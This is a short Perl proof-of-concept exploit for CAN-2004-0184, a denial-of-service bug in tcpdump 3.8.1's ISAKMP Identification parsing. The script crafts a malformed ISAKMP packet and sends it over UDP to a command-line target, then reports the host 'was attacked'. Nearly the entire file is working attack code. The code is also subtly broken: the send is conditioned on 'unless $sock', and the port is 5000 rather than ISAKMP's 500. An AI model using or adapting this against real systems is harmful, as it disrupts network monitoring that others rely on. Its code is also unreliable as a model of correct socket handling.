#!/usr/bin/perl
#
# tcpdump packet sniffer.
# Integer underflow in ISAKMP Identification payload.
# Denial of service vulnerability
# Proof of concept code
# CVE-ID: CAN-2004-0184
# 
# This vulnerability was found by:
# Rapid7, LLC Security Advisory.
#
# Vulnerable:
#  - tcpdump 3.8.1
# 
# Not vulnerable:
#  - tcpdump 3.8.3
#
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 07/12/09.

use IO::Socket;
use strict;

my $VERSAO = '0.1';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';

sub banner {
print ("\x74\x63\x70\x64\x75\x6d\x70\x20\x70\x61\x63\x6b\x65\x74\x20\x73\x6e\x69\x66\x66\x65\x72\x20\x2f\x20\x49\x6e\x74\x65\x67\x65\x72\x20\x75\x6e\x64\x65\x72\x66\x6c\x6f\x77\x20\x69\x6e\x20\x49\x53\x41\x4b\x4d\x50\x20\x49\x64\x65\x6e\x74\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x20\x70\x61\x79\x6c\x6f\x61\x64\x2e\x20\x2f\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x2e\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

my $evil_packet = ("\x00\x00\x00\x00\x00\x00\x00\x00". # Initiator cookie
    "\x00\x00\x00\x00\x00\x00\x00\x00". # Responder cookie
    "\x05".          # Next payload: Identification */
    "\x10".          # Version: 1.0 */
    "\x01".          # Exchange type */
    "\x00".          # Flags */
    "\x00\x00\x00\x00".  # Message ID */
    "\x00\x00\x00\x24".  # Length */
# ISAKMP Identification payload */
    "\x00".          # Next payload: none */
    "\x00".          # Reserved */
    "\x00\x05".      # Payload length (incorrect) */
    "\x20".          # ID type (unknown) */
    "\x00\x00\x00"  # DOI */
);

my($sock, $server_host, $msg, $port, $ipaddr, $hishost, 
   $MAXLEN, $PORTNO, $TIMEOUT);

$MAXLEN = 1024;
$PORTNO = 5000;
$TIMEOUT = 5;

# Change this!
$server_host = "@ARGV" || '127.0.0.1';

banner();

$msg = $evil_packet;
$sock = IO::Socket::INET->new(Proto     => 'udp',
                              PeerPort  => $PORTNO,
                              PeerAddr  => $server_host);

$sock-> send($msg) or die "[x] Error: $!\n" unless $sock;

eval {
    local $SIG{ALRM} = sub { die "[x] Alarm time out" };
    alarm $TIMEOUT;
    $sock->recv($msg, $MAXLEN) or die "[x] Received: $!";
    alarm 0;
    1;  # return value from eval on normalcy
} or die "[x] Received from $server_host timed out after $TIMEOUT seconds.\n";

($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
print "[+] $hishost was attacked \n";